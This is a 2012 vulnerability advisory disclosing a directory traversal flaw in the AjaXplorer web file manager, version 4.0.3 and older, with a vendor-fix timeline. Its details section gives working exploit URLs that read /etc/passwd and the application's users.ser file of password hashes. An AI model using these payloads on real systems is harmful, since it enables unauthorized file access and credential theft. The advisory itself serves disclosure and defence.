www.ExploitDevelopment.com - 2012-WEB-002 - AjaXplorer Version 4.0.3 and Older Web-Based File Manager Allows Unauthenticated Attackers to Download Files from the Local File System

www.ExploitDevelopment.com Member Vulnerability Advisories

--------------------------------------------------------------------------
www.ExploitDevelopment.com 2012-WEB-002
--------------------------------------------------------------------------

TITLE:
AjaXplorer Version 4.0.3 and Older Web-Based File Manager Allows Unauthenticated Attackers to Download Files from the Local File System

SUMMARY AND IMPACT:
A vulnerability was found in the AjaXplorer Web-Based File Manager "Get Template" feature that allows attackers to retrieve files from the web server filesystem. The two URL variables that are vulnerable to directory traversal are “template_name” and “pluginName”. Once the correct number of directory traversal parent path commands is found, attacker will be able to access any file on the server that is readable by the Apache account. If the attacker views the Users.ser file that contains the AjaXplorer username and password hashes, they can log in as any user of the application using my other reported vulnerability, 2012-WEB-001.

DETAILS:
Using Mozilla Firefox and Burp Suite Proxy with Intercept enabled, access the AjaXplorer application
Copy down the "secure_token" URL querystring variable's value
GET /index.php?secure_token=SecureTokenWillBeHere&get_action=get_xml_registry HTTP/1.1
Change the following URL to include the copied "secure_token" value. The example URL will display the /etc/passwd file when AjaXplorer is installed in /var/www/html/. The second URL will display the AjaXplorer Users.ser file that contains username and password hashes for the AjaXplorer application.
a. http://VictimIP/content.php?secure_token=PutSecureTokenHere&get_action=get_template&template_name=etc/passwd&pluginName=../../../../../..&encode=false
b. http://VictimIP/content.php?secure_token=PutSecureTokenHere&get_action=get_template&template_name=data/plugins/auth.serial/users.ser&pluginName=..&encode=false

VULNERABLE PRODUCTS:
AjaXplorer Version 4.0.3 and Older

REFERENCES AND ADDITIONAL INFORMATION:
N/A

CREDITS:
StenoPlasma (at) ExploitDevelopment.com

TIMELINE:
Discovery: N/A
Vendor Notified: Feb 24, 2012
Vendor Fixed: Feb 24, 2012
Vendor Notified of Disclosure: Feb 24, 2012
Disclosure to CERT: Feb 24, 2012

VENDOR URL:
http://www.ajaxplorer.info

ADVISORY URL:
http://www.exploitdevelopment.com/Vulnerabilities/2012-WEB-002.html
http://www.kb.cert.org/vuls/id/504019

VENDOR ADVISORY URL:
http://ajaxplorer.info/ajaxplorer-4-0-4/